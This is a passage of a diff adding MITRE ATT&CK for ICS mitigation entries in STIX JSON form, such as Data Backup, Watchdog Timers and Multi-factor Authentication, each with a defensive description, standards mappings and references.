4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "created": "2019-06-11T17:02:36.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0946", + "external_id": "M0946" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Mechanical Protection Layers", + "description": "Utilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Examples include interlocks, rupture disk, release values, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) ", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0805", + "external_id": "M0805" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 
2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.512Z", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk. Software updates may need to be scheduled around operational down times.", + "labels": [ + "IEC 62443-4-2:2019 - CR 3.10", + "NIST SP 800-53 Rev. 4 - SI-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "created": "2019-06-11T17:12:55.207Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0951", + "external_id": "M0951" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.383Z", + "name": "Watchdog Timers", + "description": "Utilize watchdog timers to ensure devices can quickly detect whether a system is unresponsive.", + "labels": [ + "IEC 62443-4-2:2019 - CR 7.2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0815", + "external_id": "M0815" + } + ], + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.415Z", + "name": "Operational Information Confidentiality", + "description": "Deploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0809", + "external_id": "M0809" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:18.276Z", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 
4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0928", + "external_id": "M0928" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.007Z", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - EDR 3.2", + "NIST SP 800-53 Rev. 4 - MP-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0", + "created": "2019-06-11T16:28:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0934", + "external_id": "M0934" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.946Z", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive data-at-rest with strong encryption.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 
4 - SC-28" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "created": "2019-06-11T16:43:44.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0941", + "external_id": "M0941" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.969Z", + "name": "Network Allowlists", + "description": "Network allowlists can be implemented through either host-based files or system hosts files to specify what connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "labels": [ + "NIST SP 800-53 Rev. 
4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "type": "course-of-action", + "id": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "created": "2019-06-10T20:53:36.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0807", + "external_id": "M0807" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.556Z", + "name": "Supply Chain Management", + "description": "Implement a supply chain management program, including policies and procedures to ensure all devices and components originate from a trusted supplier and are tested to verify their integrity.", + "labels": [ + "NIST SP 800-53 Rev. 4 - SA-12" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c", + "created": "2021-04-12T17:00:21.233Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0817", + "external_id": "M0817" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.679Z", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. 
Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of 'gold-copy' back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.3", + "IEC 62443-4-2:2019 - CR 7.3", + "NIST SP 800-53 Rev. 4 - CP-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "created": "2019-07-19T14:33:33.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0953", + "external_id": "M0953" + }, + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.598Z", + "name": "Out-of-Band Communications Channel", + "description": "Have alternative methods to support communication requirements during communication failures and data integrity attacks. (Citation: National Institute of Standards and Technology April 2013) (Citation: Defense Advanced Research Projects Agency)", + "labels": [ + "NIST SP 800-53 Rev. 
4 - SC-37" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0810", + "external_id": "M0810" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + }, + { + "source_name": "Defense Advanced Research Projects Agency", + "description": "Defense Advanced Research Projects Agency National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 Rapid Attack Detection, Isolation and Characterization Systems (RADICS) Retrieved. 2020/09/17 ", + "url": "https://www.darpa.mil/program/rapid-attack-detection-isolation-and-characterization-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.836Z", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. 
Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.4", + "IEC 62443-4-2:2019 - CR 3.4", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "created": "2019-06-11T17:06:14.029Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0947", + "external_id": "M0947" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.263Z", + "name": "Communication Authenticity", + "description": "When communicating over an untrusted network, utilize secure network protocols that both authenticate the message sender and can verify its integrity. This can be done either through message authentication codes (MACs) or digital signatures, to detect spoofed network messages and unauthorized connections.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.1", + "IEC 62443-4-2:2019 - CR 3.1", + "NIST SP 800-53 Rev. 
4 - SC-8; SC-23" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0802", + "external_id": "M0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:20.110Z", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "created": "2019-06-11T16:45:19.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0942", + "external_id": "M0942" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "created": "2019-06-06T19:55:50.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0919", + "external_id": "M0919" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Safety Instrumented Systems", + "description": "Utilize Safety Instrumented Systems (SIS) to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically include sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) . 
Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0812", + "external_id": "M0812" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.076Z", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "labels": [ + "NIST SP 800-53 Rev. 
4 - AT-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "created": "2019-06-06T16:50:04.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0917", + "external_id": "M0917" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:18.842Z", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. Within industrial control environments assets such as low-level controllers, workstations, and HMIs have real-time operational control and safety requirements which may restrict the use of multi-factor.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.7", + "IEC 62443-4-2:2019 - CR 1.7", + "NIST SP 800-53 Rev. 
4 - IA-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "created": "2019-06-10T20:53:36.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0932", + "external_id": "M0932" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:16.897Z", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "labels": [ + "NIST SP 800-53 Rev. 4 - RA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "created": "2019-06-06T16:47:30.700Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0916", + "external_id": "M0916" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:13.851Z", + "name": "Authorization Enforcement", + "description": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. 
For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector (Citation: International Electrotechnical Commission July 2020), while IEEE 1686 defines standard permissions for users of IEDs. (Citation: Institute of Electrical and Electronics Engineers January 2014)", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0800", + "external_id": "M0800" + }, + { + "source_name": "International Electrotechnical Commission July 2020", + "description": "International Electrotechnical Commission 2020, July 17 IEC 62351 - Power systems management and associated information exchange - Data and communications security Retrieved. 2020/09/17 ", + "url": "https://webstore.iec.ch/publication/6912" + }, + { + "source_name": "Institute of Electrical and Electronics Engineers January 2014", + "description": "Institute of Electrical and Electronics Engineers 2014, January 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities Retrieved. 
2020/09/17 ", + "url": "https://standards.ieee.org/standard/1686-2013.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.252Z", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.3", + "IEC 62443-4-2:2019 - CR 1.3", + "NIST SP 800-53 Rev. 4 - AC-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "created": "2019-06-06T16:50:58.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0918", + "external_id": "M0918" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:15.773Z", + "name": "Redundancy of Service", + "description": "Redundancy could be provided for both critical ICS devices and services, such as back-up devices or hot-standbys.", + "labels": [ + "NIST SP 800-53 Rev. 
4 - CP-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0811", + "external_id": "M0811" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.592Z", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-6" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "created": "2019-06-06T20:54:49.964Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0922", + "external_id": "M0922" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.915Z", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + 
"NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21", + "created": "2019-07-19T14:40:23.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0954", + "external_id": "M0954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.180Z", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software. Within industrial control environments, antivirus/antimalware installations should be limited to assets that are not involved in critical or real-time operations. To minimize the impact to system availability, all products should first be validated within a representative test environment before deployment to production systems. (Citation: NCCIC August 2018)", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 
4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "created": "2019-06-11T17:08:33.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0949", + "external_id": "M0949" + }, + { + "source_name": "NCCIC August 2018", + "description": "NCCIC 2018, August 2 Recommended Practice: Updating Antivirus in an Industrial Control System Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/Recommended%20Practice%20Updating%20Antivirus%20in%20an%20Industrial%20Control%20System_S508C.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.800Z", + "name": "Minimize Wireless Signal Propagation", + "description": "Wireless signals frequently propagate outside of organizational boundaries, which provide opportunities for adversaries to monitor or gain unauthorized access to the wireless network. (Citation: CISA March 2010) To minimize this threat, organizations should implement measures to detect, understand, and reduce unnecessary RF propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.6", + "IEC 62443-4-2:2019 - CR 1.6", + "NIST SP 800-53 Rev. 
